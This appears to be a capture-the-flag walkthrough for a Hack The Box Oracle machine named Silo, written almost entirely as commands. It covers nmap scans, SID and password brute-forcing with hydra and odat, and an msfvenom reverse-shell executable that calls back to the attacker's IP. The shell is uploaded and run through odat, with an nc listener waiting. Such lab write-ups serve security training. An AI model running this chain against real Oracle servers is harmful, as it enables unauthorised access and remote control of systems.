Ping
ping 10.10.10.82
Nmap Default Scan
nmap 10.10.10.82 -oN dnmap
Nmap Script And Service Scan
nmap 10.10.10.82 -sV -sC -A -oN snmap
Nmap All Port Scan
nmap 10.10.10.82 -p- -sC -sV --open -T5 -oN anmap
Oracle Enumeration on port 1521 First will try to Check is it open to Listen
tnscmd10g status -h 10.10.10.82
No luck, will use hydra to get SID or Creds
hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 10.10.10.82 oracle-sid -t 64 -I
Have also used odat to get Valid Sid
odat sidguesser -s 10.10.10.82 -p1521
Found valid SID, it is XE, using this will get creds
odat passwordguesser -s 10.10.10.82 -p1521 -d XE
or
odat all -s 10.10.10.82 -p 1521 -d XE -v
it will take time wait to for the complete enumeration
Got it…!
We now have valid credentials: username scott and password tiger for the server identified as XE. We can use these credentials to upload and execute a reverse shell.
Will generate a binary using MSVENOM
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe > shell.exe
Upload it into the server
odat utlfile -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --putFile /temp pwn.exe /root/HTB/linux/silo/shell.exe
Trigger it catch Reverse Shell, al Set up listener
rlwrap nc -nvlp 443
odat externaltable -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --exec /temp pwn.exe
Got it…!
We Are nt/authority, so no need to do Privilege Escalation…!
User.txt
Root.txt
Done with Silo…:)